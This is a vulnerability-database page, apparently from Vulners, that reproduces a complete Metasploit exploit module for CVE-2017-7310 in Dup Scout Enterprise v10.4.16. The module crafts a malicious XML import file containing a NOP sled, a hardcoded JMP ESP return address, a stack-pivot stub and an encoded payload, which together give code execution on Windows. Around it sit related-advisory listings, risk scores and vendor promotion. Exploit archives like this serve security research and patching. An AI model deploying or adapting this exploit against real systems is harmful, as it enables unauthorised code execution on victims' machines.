Vulners
Lucene search
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow Exploit | 25 Jan 201800:00 | – | zdt |
| Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) Exploit | 21 Feb 201800:00 | – | zdt |
 | CVE-2017-7310 | 29 Mar 201700:00 | – | circl |
 | Buffer Overflow Vulnerability in Multiple Flexense Products | 31 Mar 201700:00 | – | cnvd |
 | CVE-2017-7310 | 29 Mar 201721:00 | – | cve |
 | CVE-2017-7310 | 29 Mar 201721:00 | – | cvelist |
 | Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit) | 24 Jan 201800:00 | – | exploitdb |
| Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitdb |
 | Disk Pulse Enterprise 10.4.18 - Import Command Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitpack |
 | Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow | 15 Jan 201820:46 | – | metasploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
'Description' => %q(
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
by using the import command option to import a specially crafted xml file.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'References' =>
[
[ 'CVE', '2017-7310' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x27",
'StackAdjustment' => -3500
},
'Targets' =>
[
['Windows Universal', { 'Ret' => 0x651BB77A } ] # JMP ESP [QtGui4.dll]
],
'Privileged' => false,
'DisclosureDate' => '2017-03-29',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
])
end
def exploit
esp = "\x8d\x44\x24\x14" #LEA EAX, [ESP+14h]
jmp = "\xff\xe0" # JMP EAX
buf = "<?xml ?><a name='"
buf << make_nops(1560)
buf << [target.ret].pack('V')
buf << make_nops(16)
buf << esp
buf << jmp
buf << make_nops(14)
buf << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buf)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
0.6Low risk
Vulners AI Score0.6
CVSS 26.8
CVSS 37.8
EPSS0.66811